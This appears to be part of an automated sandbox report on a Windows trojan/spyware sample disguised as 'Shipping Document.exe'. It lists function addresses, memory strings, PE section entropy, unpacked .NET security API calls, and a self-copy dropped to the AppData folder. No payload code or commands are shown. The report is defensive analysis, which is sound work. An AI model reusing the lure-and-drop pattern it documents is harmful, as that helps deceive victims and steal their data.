                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0040E153 10_2_0040E153
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_00410163 10_2_00410163
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_004169C3 10_2_004169C3
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_004169BF 10_2_004169BF
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0040E297 10_2_0040E297
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0040E2A3 10_2_0040E2A3
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_004023CD 10_2_004023CD
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_004023D0 10_2_004023D0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_004044DA 10_2_004044DA
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0040FF43 10_2_0040FF43
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_00402F50 10_2_00402F50
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0040FF3F 10_2_0040FF3F
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0042EFA3 10_2_0042EFA3
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011AA118 10_2_011AA118
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01100100 10_2_01100100
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01198158 10_2_01198158
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011D01AA 10_2_011D01AA
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011C41A2 10_2_011C41A2
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011C81CC 10_2_011C81CC
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011A2000 10_2_011A2000
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011CA352 10_2_011CA352
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0111E3F0 10_2_0111E3F0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011D03E6 10_2_011D03E6
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011B0274 10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011902C0 10_2_011902C0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01110535 10_2_01110535
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011D0591 10_2_011D0591
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011B4420 10_2_011B4420
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011C2446 10_2_011C2446
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011BE4F6 10_2_011BE4F6
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01134750 10_2_01134750
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01110770 10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0110C7C0 10_2_0110C7C0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0112C6E0 10_2_0112C6E0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01126962 10_2_01126962
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011129A0 10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011DA9A6 10_2_011DA9A6
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0111A840 10_2_0111A840
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01112840 10_2_01112840
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_010F68B8 10_2_010F68B8
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113E8F0 10_2_0113E8F0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011CAB40 10_2_011CAB40
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C6BD710_2_011C6BD7
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110EA8010_2_0110EA80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011ACD1F10_2_011ACD1F
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111AD0010_2_0111AD00
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01128DBF10_2_01128DBF
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110ADE010_2_0110ADE0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110C0010_2_01110C00
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0CB510_2_011B0CB5
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01100CF210_2_01100CF2
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01130F3010_2_01130F30
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B2F3010_2_011B2F30
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01152F2810_2_01152F28
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01184F4010_2_01184F40
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118EFA010_2_0118EFA0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01102FC810_2_01102FC8
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111CFE010_2_0111CFE0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CEE2610_2_011CEE26
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110E5910_2_01110E59
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01122E9010_2_01122E90
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CCE9310_2_011CCE93
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CEEDB10_2_011CEEDB
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011DB16B10_2_011DB16B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0114516C10_2_0114516C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FF17210_2_010FF172
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111B1B010_2_0111B1B0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011170C010_2_011170C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011BF0CC10_2_011BF0CC
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C70E910_2_011C70E9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CF0E010_2_011CF0E0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C132D10_2_011C132D
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FD34C10_2_010FD34C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0115739A10_2_0115739A
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011152A010_2_011152A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112B2C010_2_0112B2C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B12ED10_2_011B12ED
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C757110_2_011C7571
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AD5B010_2_011AD5B0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D95C310_2_011D95C3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CF43F10_2_011CF43F
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110146010_2_01101460
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CF7B010_2_011CF7B0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0115563010_2_01155630
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C16CC10_2_011C16CC
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A591010_2_011A5910
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111995010_2_01119950
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112B95010_2_0112B950
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117D80010_2_0117D800
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011138E010_2_011138E0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CFB7610_2_011CFB76
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112FB8010_2_0112FB80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01185BF010_2_01185BF0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0114DBF910_2_0114DBF9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CFA4910_2_011CFA49
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C7A4610_2_011C7A46
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01183A6C10_2_01183A6C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01155AA010_2_01155AA0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011ADAAC10_2_011ADAAC
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B1AA310_2_011B1AA3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011BDAC610_2_011BDAC6
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C1D5A10_2_011C1D5A
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01113D4010_2_01113D40
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C7D7310_2_011C7D73
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112FDC010_2_0112FDC0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01189C3210_2_01189C32
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CFCF210_2_011CFCF2
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CFF0910_2_011CFF09
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01111F9210_2_01111F92
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CFFB110_2_011CFFB1
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010D3FD510_2_010D3FD5
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010D3FD210_2_010D3FD2
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01119EB010_2_01119EB0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0115497012_2_01154970
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0115283012_2_01152830
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0115087212_2_01150872
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_01152B1912_2_01152B19
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_01153AC812_2_01153AC8
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_01151CEF12_2_01151CEF
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_011530E012_2_011530E0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0115356012_2_01153560
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0115641012_2_01156410
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0115672012_2_01156720
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0115275112_2_01152751
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0115279012_2_01152790
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0115487F12_2_0115487F
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0115589812_2_01155898
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0115588812_2_01155888
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_01156AA012_2_01156AA0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_01156CB012_2_01156CB0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_01156CC012_2_01156CC0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_01156F5012_2_01156F50
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_01156F4012_2_01156F40
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_04B9D4B112_2_04B9D4B1
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_04BB754012_2_04BB7540
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_04BB9CF012_2_04BB9CF0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_04BB753C12_2_04BB753C
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_062B869812_2_062B8698
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_062B234812_2_062B2348
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_062B279012_2_062B2790
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_062B081312_2_062B0813
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_062B0C7012_2_062B0C70
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_062B084812_2_062B0848
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_062B10B812_2_062B10B8
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_062B0C8012_2_062B0C80
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_062B41F012_2_062B41F0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0846EE3012_2_0846EE30
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0884481012_2_08844810
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0884D54812_2_0884D548
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0884167812_2_08841678
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_08840EA712_2_08840EA7
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_08840EA812_2_08840EA8
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0884E1C812_2_0884E1C8
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0884E1D812_2_0884E1D8
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0884D53912_2_0884D539
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_088447F012_2_088447F0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A002C4012_2_0A002C40
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A0011D112_2_0A0011D1
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A0007B912_2_0A0007B9
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A00A4F012_2_0A00A4F0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A00651812_2_0A006518
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A0005F012_2_0A0005F0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A0019B012_2_0A0019B0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A0019C012_2_0A0019C0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A00C38912_2_0A00C389
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A00000712_2_0A000007
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A00003012_2_0A000030
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A00004012_2_0A000040
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A00165812_2_0A001658
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A00169812_2_0A001698
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A0005E012_2_0A0005E0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0135010020_2_01350100
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013A600020_2_013A6000
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013E02C020_2_013E02C0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0136053520_2_01360535
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0136077020_2_01360770
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0138475020_2_01384750
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0135C7C020_2_0135C7C0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0137C6E020_2_0137C6E0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0137696220_2_01376962
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013629A020_2_013629A0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0136284020_2_01362840
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0136A84020_2_0136A840
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013468B820_2_013468B8
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0139889020_2_01398890
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0138E8F020_2_0138E8F0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0135EA8020_2_0135EA80
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0136AD0020_2_0136AD00
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0136ED7A20_2_0136ED7A
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01378DBF20_2_01378DBF
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0135ADE020_2_0135ADE0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01368DC020_2_01368DC0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01360C0020_2_01360C00
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01350CF220_2_01350CF2
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01380F3020_2_01380F30
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013A2F2820_2_013A2F28
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013D4F4020_2_013D4F40
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013DEFA020_2_013DEFA0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01352FC820_2_01352FC8
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01360E5920_2_01360E59
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01372E9020_2_01372E90
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0134F17220_2_0134F172
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0139516C20_2_0139516C
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0136B1B020_2_0136B1B0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0134D34C20_2_0134D34C
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013633F320_2_013633F3
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013652A020_2_013652A0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0137D2F020_2_0137D2F0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0137B2C020_2_0137B2C0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0135146020_2_01351460
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0136349720_2_01363497
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013A74E020_2_013A74E0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0136B73020_2_0136B730
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0136995020_2_01369950
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0137B95020_2_0137B950
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0136599020_2_01365990
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013CD80020_2_013CD800
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013638E020_2_013638E0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0137FB8020_2_0137FB80
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0139DBF920_2_0139DBF9
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013D5BF020_2_013D5BF0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013D3A6C20_2_013D3A6C
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01363D4020_2_01363D40
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0137FDC020_2_0137FDC0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013D9C3220_2_013D9C32
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01379C2020_2_01379C20
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01361F9220_2_01361F92
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01369EB020_2_01369EB0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: String function: 01145130 appears 58 times
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: String function: 0117EA12 appears 86 times
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: String function: 010FB970 appears 277 times
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: String function: 01157E54 appears 111 times
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: String function: 0118F290 appears 105 times
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: String function: 013A7E54 appears 97 times
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: String function: 013CEA12 appears 37 times
Source: Shipping Document.exe, 00000000.00000002.1296197504.0000000009B90000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs Shipping Document.exe
Source: Shipping Document.exe, 00000000.00000002.1268642762.0000000002701000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs Shipping Document.exe
Source: Shipping Document.exe, 00000000.00000002.1287455872.0000000004CBB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Shipping Document.exe
Source: Shipping Document.exe, 00000000.00000000.1243695100.0000000000438000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamexqqP.exe4 vs Shipping Document.exe
Source: Shipping Document.exe, 00000000.00000002.1268642762.000000000275C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs Shipping Document.exe
Source: Shipping Document.exe, 00000000.00000002.1267858070.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Shipping Document.exe
Source: Shipping Document.exe, 00000000.00000002.1296658325.0000000009BF0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs Shipping Document.exe
Source: Shipping Document.exe, 00000000.00000002.1270712727.0000000003F05000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs Shipping Document.exe
Source: Shipping Document.exe, 0000000A.00000002.1436632647.00000000011FD000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Shipping Document.exe
Source: Shipping Document.exe, 0000000A.00000002.1436200153.0000000000C78000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameXCOPY.EXEj% vs Shipping Document.exe
Source: Shipping Document.exe | Binary or memory string: OriginalFilenamexqqP.exe4 vs Shipping Document.exe
Source: Shipping Document.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Shipping Document.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KOENBvWt.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Shipping Document.exe | Static PE information: Section: taM%C#%u ZLIB complexity 1.000383148923445
Source: KOENBvWt.exe.0.dr | Static PE information: Section: taM%C#%u ZLIB complexity 1.000383148923445
Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, F7dFk7fClPC3QVcrtR.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, F7dFk7fClPC3QVcrtR.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, e6tPm0aIb7UvqPflDt.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, e6tPm0aIb7UvqPflDt.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, e6tPm0aIb7UvqPflDt.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, F7dFk7fClPC3QVcrtR.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, F7dFk7fClPC3QVcrtR.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, e6tPm0aIb7UvqPflDt.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, e6tPm0aIb7UvqPflDt.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, e6tPm0aIb7UvqPflDt.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, F7dFk7fClPC3QVcrtR.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, F7dFk7fClPC3QVcrtR.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, e6tPm0aIb7UvqPflDt.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, e6tPm0aIb7UvqPflDt.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, e6tPm0aIb7UvqPflDt.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@23/16@13/9
Source: C:\Users\user\Desktop\Shipping Document.exe | File created: C:\Users\user\AppData\Roaming\KOENBvWt.exe
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Mutant created: NULL
